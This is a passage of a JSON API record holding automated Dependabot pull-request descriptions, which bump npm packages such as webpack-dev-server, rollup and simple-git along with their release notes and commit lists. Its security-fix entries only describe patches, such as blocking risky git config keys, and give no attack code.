(truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v3.3.1...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `rollup` from 0.46.3 to 2.80.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/rollup/rollup/releases\"\u003erollup's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev.2.79.2\u003c/h2\u003e\n\u003ch2\u003e2.79.2\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2024-09-26\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix a vulnerability in generated code that affects IIFE, UMD and CJS bundles when run in a browser context (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/5671\"\u003e#5671\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/5671\"\u003e#5671\u003c/a\u003e: Fix DOM Clobbering CVE (\u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/rollup/rollup/blob/v2.80.0/CHANGELOG.md\"\u003erollup's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.80.0\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2026-02-22\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eThrow when the generated bundle contains paths that would leave the output directory (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6277\"\u003e#6277\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6277\"\u003e#6277\u003c/a\u003e: Validate bundle stays within output dir (\u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.79.2\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2024-09-26\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eResolve CVE-2024-43788 (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/5677\"\u003e#5677\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/5677\"\u003e#5677\u003c/a\u003e: resolve DOM Clobbering CVE-2024-43788 (backport to v2) (\u003ca href=\"https://github.com/fabianszabo\"\u003e\u003ccode\u003e@​fabianszabo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.79.1\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2022-09-22\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAvoid massive performance degradation when creating thousands of chunks (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/4643\"\u003e#4643\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/4639\"\u003e#4639\u003c/a\u003e: fix: typo docs and contributors link in CONTRIBUTING.md (\u003ca href=\"https://github.com/takurinton\"\u003e\u003ccode\u003e@​takurinton\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/4641\"\u003e#4641\u003c/a\u003e: Update type definition of resolveId (\u003ca href=\"https://github.com/ivanjonas\"\u003e\u003ccode\u003e@​ivanjonas\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/4643\"\u003e#4643\u003c/a\u003e: Improve performance of chunk naming collision check (\u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.79.0\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2022-08-31\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003eamd.forceJsExtensionForImports\u003c/code\u003e to enforce using \u003ccode\u003e.js\u003c/code\u003e extensions for relative AMD imports (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/4607\"\u003e#4607\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/4607\"\u003e#4607\u003c/a\u003e: add option to keep extensions for amd (\u003ca href=\"https://github.com/wh1tevs\"\u003e\u003ccode\u003e@​wh1tevs\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/d17ae15336a45c3c59b2a4aacac2b14186035d28\"\u003e\u003ccode\u003ed17ae15\u003c/code\u003e\u003c/a\u003e 2.80.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3\"\u003e\u003ccode\u003ed6dee5e\u003c/code\u003e\u003c/a\u003e Validate bundle stays within output dir (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6277\"\u003e#6277\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/c9bd03d12e96c46122a0372d3bbe9b468cee57da\"\u003e\u003ccode\u003ec9bd03d\u003c/code\u003e\u003c/a\u003e 2.79.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/48aef33cf2f2a6dfb175afb3bcd6a977c81f1d5c\"\u003e\u003ccode\u003e48aef33\u003c/code\u003e\u003c/a\u003e fix: resolve DOM Clobbering CVE-2024-43788 (backport to v2) (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/5677\"\u003e#5677\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/69ff4181e701a0fe0026d0ba147f31bc86beffa8\"\u003e\u003ccode\u003e69ff418\u003c/code\u003e\u003c/a\u003e 2.79.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/04dce1bc734c22924b02c3d57061710dcb6395e4\"\u003e\u003ccode\u003e04dce1b\u003c/code\u003e\u003c/a\u003e Update changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/159137e6425a97c126645110d19d0533643d5ee7\"\u003e\u003ccode\u003e159137e\u003c/code\u003e\u003c/a\u003e fix: typo docs and contributors link in CONTRIBUTING.md (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/4639\"\u003e#4639\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/e1392b3905de33dc432a5692f9a6ec60103ea2f6\"\u003e\u003ccode\u003ee1392b3\u003c/code\u003e\u003c/a\u003e Update type definition of resolveId (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/4641\"\u003e#4641\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/7836357aaeb1fb103318bca3f0ee8beacdec0470\"\u003e\u003ccode\u003e7836357\u003c/code\u003e\u003c/a\u003e Improve performance of chunk naming collision check (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/4643\"\u003e#4643\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/71d20c9d4a75b51b95c56df43ba1efd934158acb\"\u003e\u003ccode\u003e71d20c9\u003c/code\u003e\u003c/a\u003e Reduce permissions for repl-artefacts.yml workflow (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/4630\"\u003e#4630\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/rollup/rollup/compare/v0.46.3...v2.80.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~lukastaegert\"\u003elukastaegert\u003c/a\u003e, a new releaser for rollup since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version adds \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `simple-git` from 3.32.3 to 3.36.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/steveukx/git-js/releases\"\u003esimple-git's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esimple-git@3.36.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e89a2294: Extend known exploitable configuration keys and per-task environment variables.\u003c/p\u003e\n\u003cp\u003eNote - \u003ccode\u003eParsedVulnerabilities\u003c/code\u003e from \u003ccode\u003eargv-parser\u003c/code\u003e is removed in favour of a readonly array of \u003ccode\u003eVulnerability\u003c/code\u003e to match usage in \u003ccode\u003esimple-git\u003c/code\u003e, rolled into the new \u003ccode\u003evulnerabilityCheck\u003c/code\u003e for simpler access to the identified issues.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/zebbern\"\u003e\u003ccode\u003e@​zebbern\u003c/code\u003e\u003c/a\u003e for identifying the need to block \u003ccode\u003ecore.fsmonitor\u003c/code\u003e.\nThanks to \u003ca href=\"https://github.com/kodareef5\"\u003e\u003ccode\u003e@​kodareef5\u003c/code\u003e\u003c/a\u003e for identifying the need to block \u003ccode\u003eGIT_CONFIG_COUNT\u003c/code\u003e environment variables and \u003ccode\u003e--template\u003c/code\u003e / \u003ccode\u003emerge\u003c/code\u003e related config.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e1ad57e8: Remove conflicting node:buffer import\u003c/li\u003e\n\u003cli\u003eUpdated dependencies [89a2294]\u003c/li\u003e\n\u003cli\u003eUpdated dependencies [675570a]\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​simple-git/argv-parser\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.1.0\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​simple-git/args-pathspec\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.0.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.35.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e0cf9d8c: Improvements for mono-repo publishing pipeline\u003c/li\u003e\n\u003cli\u003eUpdated dependencies [0cf9d8c]\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​simple-git/args-pathspec\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.0.2\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​simple-git/argv-parser\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.0.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.35.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e0de400e: Update monorepo version handling during publish\u003c/li\u003e\n\u003cli\u003eUpdated dependencies [0de400e]\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​simple-git/argv-parser\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.0.2\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.33.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea263635: Use \u003ccode\u003epathspec\u003c/code\u003e wrappers for remote and local paths when running either \u003ccode\u003egit.clone\u003c/code\u003e or \u003ccode\u003egit.mirror\u003c/code\u003e to\navoid leaving them less open for unexpected outcomes when passing unsanitised data into these tasks.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003ee253a0d: Enhanced \u003ccode\u003egit -c\u003c/code\u003e checks in \u003ccode\u003eunsa...\n\n_Description has been truncated_","html_url":"https://github.com/Dargon789/codesandbox-client/pull/137","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dargon789%2Fcodesandbox-client/issues/137","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/137/packages"}},{"old_version":"5.2.2","new_version":"5.2.4","update_type":"patch","path":null,"pr_created_at":"2026-05-29T23:48:40.000Z","version_change":"5.2.2 → 5.2.4","issue":{"uuid":"4552302770","node_id":"PR_kwDOR9nArM7g1yCr","number":5,"state":"open","title":"Bump the npm_and_yarn group across 1 directory with 17 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-29T23:48:40.000Z","updated_at":"2026-05-29T23:49:25.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":17,"packages":[{"name":"turbo","old_version":"2.5.2","new_version":"2.9.14","repository_url":"https://github.com/vercel/turborepo"},{"name":"vite","old_version":"6.3.4","new_version":"6.4.2","repository_url":"https://github.com/vitejs/vite"},{"name":"lodash","old_version":"4.17.21","new_version":"4.18.1","repository_url":"https://github.com/lodash/lodash"},{"name":"svelte","old_version":"4.2.19","new_version":"5.55.7","repository_url":"https://github.com/sveltejs/svelte"},{"name":"ws","old_version":"8.17.1","new_version":"8.20.1","repository_url":"https://github.com/websockets/ws"},{"name":"webpack-dev-server","old_version":"5.2.2","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"next","old_version":"15.4.0","new_version":"15.5.18","repository_url":"https://github.com/vercel/next.js"},{"name":"@babel/plugin-transform-modules-systemjs","old_version":"7.22.5","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"brace-expansion","old_version":"1.1.12","new_version":"1.1.15","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"fast-uri","old_version":"3.0.3","new_version":"3.1.2","repository_url":"https://github.com/fastify/fast-uri"},{"name":"flatted","old_version":"3.3.1","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"follow-redirects","old_version":"1.15.6","new_version":"1.16.0","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"handlebars","old_version":"4.7.6","new_version":"4.7.9","repository_url":"https://github.com/handlebars-lang/handlebars.js"},{"name":"picomatch","old_version":"2.3.1","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"tar","old_version":"7.4.3","new_version":"7.5.15","repository_url":"https://github.com/isaacs/node-tar"},{"name":"underscore","old_version":"1.13.2","new_version":"1.13.8","repository_url":"https://github.com/jashkenas/underscore"},{"name":"yaml","old_version":"1.10.2","new_version":"1.10.3","repository_url":"https://github.com/eemeli/yaml"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 17 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [turbo](https://github.com/vercel/turborepo) | `2.5.2` | `2.9.14` |\n| [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) | `6.3.4` | `6.4.2` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.21` | `4.18.1` |\n| [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte) | `4.2.19` | `5.55.7` |\n| [ws](https://github.com/websockets/ws) | `8.17.1` | `8.20.1` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.2` | `5.2.4` |\n| [next](https://github.com/vercel/next.js) | `15.4.0` | `15.5.18` |\n| [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs) | `7.22.5` | `7.29.7` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.12` | `1.1.15` |\n| [fast-uri](https://github.com/fastify/fast-uri) | `3.0.3` | `3.1.2` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.3.1` | `3.4.2` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.6` | `1.16.0` |\n| [handlebars](https://github.com/handlebars-lang/handlebars.js) | `4.7.6` | `4.7.9` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n| [tar](https://github.com/isaacs/node-tar) | `7.4.3` | `7.5.15` |\n| [underscore](https://github.com/jashkenas/underscore) | `1.13.2` | `1.13.8` |\n| [yaml](https://github.com/eemeli/yaml) | `1.10.2` | `1.10.3` |\n\n\nUpdates `turbo` from 2.5.2 to 